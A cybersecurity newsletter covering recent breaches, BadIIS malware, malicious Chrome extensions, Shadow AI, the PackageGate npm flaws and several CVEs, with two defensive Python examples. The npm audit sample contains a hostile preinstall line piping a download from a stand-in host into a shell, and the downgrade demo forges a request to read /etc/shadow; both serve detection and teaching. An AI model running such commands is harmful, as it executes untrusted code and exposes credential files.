Secret CISO 1/31: Panera & Coupang Breaches, China-Linked BadIIS Malware, Shadow AI Risks, PackageGate Threats

Welcome to today's edition of Secret CISO, where we unravel the latest in cybersecurity breaches and vulnerabilities, weaving a narrative of caution and vigilance. As we navigate through the digital landscape, today's stories highlight the persistent threats and the urgent need for robust security measures.

First, we delve into the Panera Bread breach, where 14 million customers' data fell into the hands of the notorious ShinyHunters group. This incident raises alarms about data protection practices, echoing similar concerns in South Korea, where Coupang's interim CEO faces scrutiny over a significant data breach.

In the financial sector, CFD Investments and the Center for Life Resources are under legal investigation following breaches that exposed sensitive information, potentially leading to class action lawsuits. Meanwhile, The Phia Group's breach underscores the critical need for safeguarding health information.

On the threat-actor front, the China-linked UAT-8099 group is compromising IIS servers in Asia and planting the BadIIS module for search-engine fraud, while a cybercrime group claims credit for a series of voice phishing attacks, highlighting the evolving nature of cyber threats.

Security researchers have also uncovered malicious Chrome extensions exploiting affiliate links and stealing ChatGPT access, emphasizing the importance of scrutinizing browser extensions. Additionally, the rise of 'Shadow AI' poses new risks as employees increasingly use unauthorized AI tools.

In the realm of software vulnerabilities, the 'PackageGate' flaws threaten software supply chains, while several CVEs reveal critical weaknesses in widely used systems, urging immediate action to patch and secure affected applications.

Stay informed and vigilant as we continue to explore these unfolding stories, reminding us of the ever-present need for cybersecurity resilience.

Data Breaches

  1. Panera Bread Breach: ShinyHunters Claims Hack of 14 Million Customers' Data: Panera Bread and its customers are the latest victims of a data breach reportedly carried out by the ShinyHunters hacking group. The breach exposed sensitive information of 14 million customers, raising concerns over the company's data security practices. Panera is currently investigating the incident and working to enhance its security measures. Source: Mashable.
  2. South Korean Police to Question Interim CEO of Coupang in Data Breach Probe: South Korean police are set to question the interim CEO of Coupang over a significant data breach that exposed sensitive customer information. The breach has sparked a major investigation, with authorities seeking to understand the extent of the damage and the company's response. Coupang has pledged full cooperation with the investigation. Source: Reuters.
  3. CFD Investments Data Breach Investigation: Strauss Borrelli PLLC is investigating a recent data breach at CFD Investments, Inc. The breach has raised alarms about the security of financial data and the potential impact on clients. The law firm is exploring the possibility of a class action lawsuit to address the breach's consequences. Source: Strauss Borrelli PLLC.
  4. Center for Life Resources Data Breach Reported; Attorneys Investigating: The Center for Life Resources has reported a data breach, prompting legal investigations into the incident. The breach has potentially exposed sensitive personal information, leading to discussions about a possible class action lawsuit. Affected individuals are advised to monitor their personal data closely. Source: Class Action.
  5. The Phia Group Data Breach Affects SSNs, Health Info: The Phia Group has experienced a data breach affecting Social Security numbers and health information. This breach has prompted legal scrutiny and potential class action lawsuits. The incident highlights the critical need for robust data protection measures in handling sensitive health information. Source: Class Action.

Security Research

  1. China-Linked UAT-8099 Targets IIS Servers in Asia with BadIIS SEO Malware: Security researchers have identified a new campaign by the China-linked group UAT-8099, which is compromising IIS servers in Asia and installing BadIIS, a malicious native IIS module. Because it sits in the web server's request pipeline, BadIIS can serve keyword-stuffed content to search-engine crawlers while redirecting real visitors elsewhere, hijacking the compromised site's search ranking for fraud. A module running inside IIS is invisible to scans of the site's content, so defenders should inventory installed IIS modules (for example with `appcmd list modules`) and compare them against a known-good baseline. Source: The Hacker News.
  2. Cybercrime Group Claims Credit for Voice Phishing Attacks: A cybercrime group has taken responsibility for a series of voice phishing attacks, as reported by security researchers at Okta. These attacks involve social engineering tactics to trick victims into revealing sensitive information over the phone. The incident underscores the evolving nature of phishing attacks and the need for heightened awareness and security measures. Source: TechCentral.ie.
  3. Researchers Uncover Chrome Extensions Abusing Affiliate Links and Stealing ChatGPT Access: Security experts have discovered malicious Chrome extensions that silently rewrite affiliate links and steal ChatGPT authentication tokens. An extension granted broad host permissions can read page content and session data on every site it matches, so these extensions exfiltrate user data and can compromise the accounts behind it. The findings emphasize the importance of reviewing the permissions an extension requests, and the publisher behind it, before installing it. Source: The Hacker News.
  4. Is 'Shadow AI' a Threat to Your Business? Report Claims Workers Are Increasingly More Willing to Cut Corners: A report highlights the growing risk of 'Shadow AI,' where employees use unauthorized AI tools and services, potentially exposing businesses to security vulnerabilities. The report suggests that IT teams need to reinforce policies and educate employees on the risks associated with unapproved AI usage. Source: TechRadar.
  5. 'PackageGate' Vulnerabilities Can Let Attackers Bypass Shai-Hulud Defenses: Koi Security researchers have identified six vulnerabilities, collectively known as 'PackageGate,' that could allow attackers to bypass defenses in npm and other package managers, in particular the controls organizations adopted after the Shai-Hulud npm worm, which spread through install-time lifecycle scripts. With those controls sidestepped, a malicious package can again run code on the developer or build machine that installs it, posing a significant risk to software supply chains. Source: DevOps.com.
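The defense the PackageGate item refers to is the one most teams adopted after the Shai-Hulud npm worm, which spread through install-time lifecycle scripts: disable those scripts (`ignore-scripts=true` in `.npmrc`) and know which dependencies declare them. The script below is an added example, not Koi Security's research or any project's code. It walks a `node_modules` tree (a small one constructed inline in a temporary directory, with made-up package names and commands), lists every package that declares a preinstall, install, postinstall or prepare hook, and checks whether the project's `.npmrc` disables scripts. Treat the `.npmrc` check as a baseline only, since the report above is about attackers getting around defenses of this kind.

```python
"""Audit a node_modules tree for install-time lifecycle scripts.

Added example, not Koi Security's tooling or any project's code. The node_modules
tree it scans is constructed inline in a temporary directory; package names and
commands are made up.
"""
import json
import os
import tempfile

# Hooks that npm runs automatically while installing a dependency; postinstall was
# the Shai-Hulud worm's execution vector. "prepare" runs for git and local installs.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")


def find_install_scripts(node_modules: str) -> list:
    """Return [{name, version, hooks}] for every package.json declaring an install hook."""
    findings = []
    for root, _dirs, files in os.walk(node_modules):
        if "package.json" not in files:
            continue
        try:
            with open(os.path.join(root, "package.json"), encoding="utf-8") as f:
                pkg = json.load(f)
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip it, keep walking
        scripts = pkg.get("scripts") or {}
        hooks = {h: scripts[h] for h in INSTALL_HOOKS if h in scripts}
        if hooks:
            findings.append({
                "name": pkg.get("name") or os.path.relpath(root, node_modules),
                "version": pkg.get("version", "?"),
                "hooks": hooks,
            })
    return sorted(findings, key=lambda f: f["name"])


def npmrc_ignores_scripts(npmrc_path: str) -> bool:
    """True if the .npmrc sets ignore-scripts=true. A baseline control, not a complete one."""
    try:
        with open(npmrc_path, encoding="utf-8") as f:
            for line in f:
                key, _, value = line.strip().partition("=")
                if key.strip() == "ignore-scripts" and value.strip().lower() == "true":
                    return True
    except OSError:
        pass
    return False


def audit_project(project_dir: str) -> dict:
    """Combine both checks for one project directory."""
    return {
        "ignore_scripts": npmrc_ignores_scripts(os.path.join(project_dir, ".npmrc")),
        "findings": find_install_scripts(os.path.join(project_dir, "node_modules")),
    }


def build_sample_project() -> str:
    """Construct a tiny project: one clean package, one plausible build hook, one obvious dropper."""
    base = tempfile.mkdtemp()
    manifests = {
        "left-pad": {"name": "left-pad", "version": "1.3.0",
                     "scripts": {"test": "node test.js"}},
        "@scope/native-build": {"name": "@scope/native-build", "version": "2.0.1",
                                "scripts": {"postinstall": "node-gyp rebuild"}},
        "totally-fine": {"name": "totally-fine", "version": "0.1.0",
                         "scripts": {"preinstall": "curl -s https://example.invalid/x | sh"}},
    }
    for folder, manifest in manifests.items():
        pkg_dir = os.path.join(base, "node_modules", folder)
        os.makedirs(pkg_dir)
        with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as f:
            json.dump(manifest, f)
    with open(os.path.join(base, ".npmrc"), "w", encoding="utf-8") as f:
        f.write("ignore-scripts=true\n")
    return base


if __name__ == "__main__":
    report = audit_project(build_sample_project())
    print("ignore-scripts enabled:", report["ignore_scripts"])
    for finding in report["findings"]:
        for hook, command in finding["hooks"].items():
            print(f"{finding['name']}@{finding['version']}  {hook}: {command}")
```

Point `audit_project` at a real checkout to get the list of dependencies whose install hooks you are trusting; a `postinstall` that compiles a native addon is expected, while one that pipes a download into a shell is not, and the audit cannot tell those apart for you.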

Top CVEs

  1. CVE-2025-24293: Active Storage allowed potentially unsafe image transformation methods. Applications that use Active Storage with the image_processing gem and the MiniMagick backend, and that let untrusted input reach the variant transformation options, could be exposed to command injection. Users should upgrade and, in any case, accept only a fixed allowlist of transformation methods rather than passing request parameters through. Source: Vulners.
  2. CVE-2025-62348: Salt's junos execution module used an unsafe YAML load. A specially crafted YAML payload could lead to unintended code execution in the context of the Salt process. Users should ensure their systems are patched; more generally, untrusted YAML should be parsed with a safe loader that refuses arbitrary object tags. Source: Vulners.
  3. CVE-2025-62349: Salt contains an authentication protocol version downgrade weakness. A malicious minion can send its request in the older payload format, bypassing the security checks added in the newer one and impersonating another minion. Users should upgrade to versions that address this vulnerability. Source: Vulners.
  4. CVE-2025-26385: A command injection vulnerability in a Johnson Controls Metasys component could allow remote SQL execution on Metasys installations that use SQL Express. Users should update to the fixed versions to mitigate this risk. Source: Vulners.
  5. CVE-2025-11175: Regular expression exponential blowup in the Wikimedia Foundation MediaWiki DiscussionTools extension (the advisory files it as an expression-language injection, but the impact it describes is a denial of service through a regular expression that takes exponential time on crafted input). Specific versions of the extension are affected; users should upgrade to patched versions. Source: Vulners.
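The Salt downgrade weakness (CVE-2025-62349) belongs to a broader bug class: a server that still understands an older request format lets a peer skip whatever checks the newer format introduced. The following is an added example, not Salt's code or wire protocol; the message layout, the field names, the per-minion shared keys and the HMAC proof are all assumptions chosen to illustrate the pattern. It places a vulnerable verifier that tolerates legacy payloads next to a hardened one that enforces a minimum version before trusting any other field.

```python
"""Downgrade-tolerant versus downgrade-resistant request verification.

Added illustration of the bug class behind CVE-2025-62349. This is NOT Salt's
wire protocol: payload layout, field names, keys and the HMAC scheme are
assumptions made for the example. Keys below are constructed test values.
"""
import hashlib
import hmac
import secrets

CURRENT_VERSION = 2       # v2 requests carry a nonce and an HMAC over the request
MIN_ACCEPTED_VERSION = 2  # the downgrade guard: anything older is refused outright

# One shared key per enrolled minion (constructed; a deployment would load these from disk).
MINION_KEYS = {
    "minion-a": b"a" * 32,
    "minion-b": b"b" * 32,
}


def _mac(key: bytes, version: int, minion_id: str, nonce: str, body: str) -> str:
    """HMAC-SHA256 over every field the server will act on, version included."""
    msg = f"{version}|{minion_id}|{nonce}|{body}".encode()
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


def make_request(minion_id: str, body: str, version: int = CURRENT_VERSION) -> dict:
    """Client side. version=1 reproduces the legacy format: an id and a body, no proof of key possession."""
    if version < 2:
        return {"version": 1, "id": minion_id, "body": body}
    nonce = secrets.token_hex(16)
    mac = _mac(MINION_KEYS[minion_id], version, minion_id, nonce, body)
    return {"version": version, "id": minion_id, "nonce": nonce, "body": body, "mac": mac}


def verify_hardened(req: dict, seen_nonces: set) -> tuple:
    """Server side, downgrade-resistant: check the version before trusting any other field."""
    version = req.get("version", 1)  # a missing version field means legacy format
    if not isinstance(version, int) or version < MIN_ACCEPTED_VERSION:
        return False, f"downgrade rejected: version {version!r} below {MIN_ACCEPTED_VERSION}"
    key = MINION_KEYS.get(req.get("id"))
    if key is None:
        return False, "unknown minion id"
    nonce = req.get("nonce", "")
    if not nonce or nonce in seen_nonces:
        return False, "missing or replayed nonce"
    expected = _mac(key, version, req["id"], nonce, req.get("body", ""))
    if not hmac.compare_digest(expected, req.get("mac", "")):
        return False, "bad mac: sender does not hold this minion's key"
    seen_nonces.add(nonce)
    return True, "ok"


def verify_vulnerable(req: dict, seen_nonces: set) -> tuple:
    """Server side, downgrade-tolerant: legacy payloads are trusted on the id alone,
    so anyone who can reach the port can claim to be any enrolled minion."""
    version = req.get("version", 1)
    if isinstance(version, int) and version < 2:
        return (req.get("id") in MINION_KEYS), "legacy format accepted on id only"
    return verify_hardened(req, seen_nonces)


if __name__ == "__main__":
    # An attacker on the network impersonates minion-b with a legacy-format payload.
    forged = make_request("minion-b", "run: cat /etc/shadow", version=1)
    print("vulnerable verifier:", verify_vulnerable(forged, set()))  # accepted
    print("hardened verifier:  ", verify_hardened(forged, set()))    # downgrade rejected
    # A genuine minion-a request passes once, and a replay of it is refused.
    seen = set()
    genuine = make_request("minion-a", "run: uptime")
    print("genuine:", verify_hardened(genuine, seen))
    print("replay: ", verify_hardened(genuine, seen))
```

The point of `verify_hardened` is ordering: the version check runs first and fails closed on a missing or non-integer field, so no branch of the code ever reaches a legacy parser. Raising `MIN_ACCEPTED_VERSION` is the whole migration; there is no compatibility path for the attacker to choose.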

Final Words

As we wrap up today's edition of Secret CISO, it's clear that the digital landscape is as dynamic as ever, with new threats and vulnerabilities emerging at every turn. From the Panera Bread breach affecting millions to the sophisticated tactics of cybercrime groups, the need for robust security measures and vigilant awareness has never been more critical.

We also explored the ongoing investigations into major data breaches, the rise of 'Shadow AI,' and the discovery of vulnerabilities like 'PackageGate' that threaten software supply chains. Each story serves as a reminder of the importance of staying informed and proactive in our cybersecurity efforts.

We hope you found today's insights valuable and encourage you to share this newsletter with friends and colleagues who might benefit from staying updated on the latest in cybersecurity. Together, we can build a more secure digital world.

Until next time, stay safe and vigilant!
